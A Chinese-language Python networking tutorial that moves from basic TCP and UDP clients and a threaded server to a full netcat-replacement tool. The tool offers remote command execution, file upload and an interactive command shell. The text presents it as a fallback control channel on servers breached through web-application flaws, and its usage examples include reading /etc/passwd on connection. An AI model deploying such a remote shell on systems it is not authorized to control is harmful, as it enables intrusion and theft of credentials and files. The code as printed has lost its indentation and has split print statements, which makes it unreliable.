Python网络编程
TCP客户端:
创建一个TCP客户端用来连接服务,发送垃圾数据,进行模糊测试或者进行其他任务的情况
import socket
tgt_host = "www.baidu.com"
tgt_port = 80
# 建立一个socket对象
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# 链接客户端
client.connect((tgt_host,tgt_port))
# 发送数据
client.send(b"GET / HTTP/1.1\r\nHost: baidu.com\r\n\r\n")
# 接收数据
response = client.recv(4089)
print(response)
# 运行结果
b'HTTP/1.1 200 OK\r\nAccept-Ranges: bytes\r\nCache-Control: no-cache\r\nConnection: keep-alive\r\nContent-Length: 14615\r\nContent-Type: text/html\r\nDate: Sun, 29 Aug 2021 02:03:48 GMT\r\nP3p: CP=" OTI DSP COR IVA OUR IND COM "\r\nP3p: CP=" OTI DSP COR IVA OUR IND COM "\r\nPragma: no-cache\r\nServer: BWS/1.1\r\nSet-Cookie: BAIDUID=F283BA538AA08858D3DC042DC0D4249A:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com\r\nSet-Cookie: BIDUPSID=F283BA538AA08858D3DC042DC0D4249A; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com\r\nSet-Cookie: PSTM=1630202628; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com\r\nSet-Cookie: BAIDUID=F283BA538AA088587404BEC1267021F5:FG=1; max-age=31536000; expires=Mon, 29-Aug-22 02:03:48 GMT; domain=.baidu.com; path=/; version=1; comment=bd\r\nTraceid: 1630202628242318669810811254939920375071\r\nVary: Accept-Encoding\r\nX-Frame-Options: sameorigin\r\nX-Ua-Compatible: IE=Edge,chrome=1\r\n\r\n<!DOCTYPE html><!--STATUS OK-->\r\n<html>\r\n<head>\r\n\t<meta http-equiv="content-type" content="text/html;charset=utf-8">\r\n\t<meta http-equiv="X-UA-Compatible" content="IE=Edge">\r\n\t<link rel="dns-prefetch" href="//s1.bdstatic.com"/>\r\n\t<link rel="dns-prefetch" href="//t1.baidu.com"/>\r\n\t<link rel="dns-prefetch" href="//t2.baidu.com"/>\r\n\t<link rel="dns-prefetch" href="//t3.baidu.com"/>\r\n\t<link rel="dns-prefetch" href="//t10.baid'- AF_INET参数说明我们使用的是IPV4地址或者主机名,SOCK_STREAM说明这将是一个TCP客户端
UDP客户端:
import socket
tgt_host = "127.0.0.1"
tgt_port = 80
# 建立一个socket对象
client = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
# 发送数据
client.sendto(b"AAABBBCCCDDD",(tgt_host,tgt_port))
# 接收数据
data,addr = client.recvfrom(4096)
print(data)- recvfrom()函数接受返回的UDP数据包,这将接收到会传的数据及远程主机的信息和端口号
TCP服务器:
创建一个标准的多线程服务器
import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 7777
# 创建socket对象
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print("[*]Listening on %s:%d" % (bind_ip,bind_port))
def handle_client(client_socket):
request = client_socket.recv(1024)
print("[*]Recived: %s" % request)
client_socket.send(b"ACK!!!")
client_socket.close()
while True:
client,addr= server.accept()
print("[*]Accepted connection from: %s:%d" % (addr[0],addr[1]))
# 挂起客户端线程,处理传入的数据
client_handler = threading.Thread(target=handle_client,args=(client,))
client_handler.start()- 绑定服务监听的IP和端口
- 将最大连接数设置为5,
- 将接收到的客户端的套接字对象保存到client中,将远程连接的细节保存到addr中
取代netcat:
在服务器没有安装netcat却安装了python的情况下,需要创建一个简单的客户端用来传递想使用的文件,或者创建一个监听端让自己拥有控制命令行操作的权限,如果使用web应用漏洞进入的服务器,那么在后台调用Python创建备用的控制通道显得尤为实用,这样就u需要首先在目标机器上安装木马或后门了。创建这样一个工具也是不错的python习题
#!/opt/local/bin/python2.7
import sys
import socket
import getopt
import threading
import subprocess
# define some global variables
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
# this runs a command and returns the output
def run_command(command):
# trim the newline
command = command.rstrip()
# run the command and get the output back
try:
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"
# send the output back to the client
return output
# this handles incoming client connections
def client_handler(client_socket):
global upload
global execute
global command
# check for upload
if len(upload_destination):
# read in all of the bytes and write to our destination
file_buffer = ""
# keep reading data until none is available
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
# now we take these bytes and try to write them out
try:
file_descriptor = open(upload_destination, "wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
# acknowledge that we wrote the file out
client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
except:
client_socket.send("Failed to save file to %s\r\n" % upload_destination)
# check for command execution
if len(execute):
# run the command
output = run_command(execute)
client_socket.send(output)
# now we go into another loop if a command shell was requested
if command:
while True:
# show a simple prompt
client_socket.send("<BHP:#> ")
# now we receive until we see a linefeed (enter key)
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
# we have a valid command so execute it and send back the results
response = run_command(cmd_buffer)
# send back the response
client_socket.send(response)
# this is for incoming connections
def server_loop():
global target
global port
# if no target is defined we listen on all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target, port))
server.listen(5)
while True:
client_socket, addr = server.accept()
# spin off a thread to handle our new client
client_thread = threading.Thread(target=client_handler, args=(client_socket,))
client_thread.start()
# if we don't listen we are a client....make it so.
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# connect to our target host
client.connect((target, port))
# if we detect input from stdin send it
# if not we are going to wait for the user to punch some in
if len(buffer):
client.send(buffer)
while True:
# now wait for data back
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data
if recv_len < 4096:
break
print
response,
# wait for more input
buffer = raw_input("")
buffer += "\n"
# send it off
client.send(buffer)
except:
# just catch generic errors - you can do your homework to beef this up
print
"[*] Exception! Exiting."
# teardown the connection
client.close()
def usage():
print
"Netcat Replacement"
print
print
"Usage: bhpnet.py -t target_host -p port"
print
"-l --listen - listen on [host]:[port] for incoming connections"
print
"-e --execute=file_to_run - execute the given file upon receiving a connection"
print
"-c --command - initialize a command shell"
print
"-u --upload=destination - upon receiving connection upload a file and write to [destination]"
print
print
print
"Examples: "
print
"bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
print
"bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
print
"bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
print
"echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135"
sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# read the commandline options
try:
opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:",
["help", "listen", "execute", "target", "port", "command", "upload"])
except getopt.GetoptError as err:
print
str(err)
usage()
for o, a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l", "--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False, "Unhandled Option"
# are we going to listen or just send data from stdin
if not listen and len(target) and port > 0:
# read in the buffer from the commandline
# this will block, so send CTRL-D if not sending input
# to stdin
buffer = sys.stdin.read()
# send data off
client_sender(buffer)
# we are going to listen and potentially
# upload things, execute commands and drop a shell back
# depending on our command line options above
if listen:
server_loop()
main()
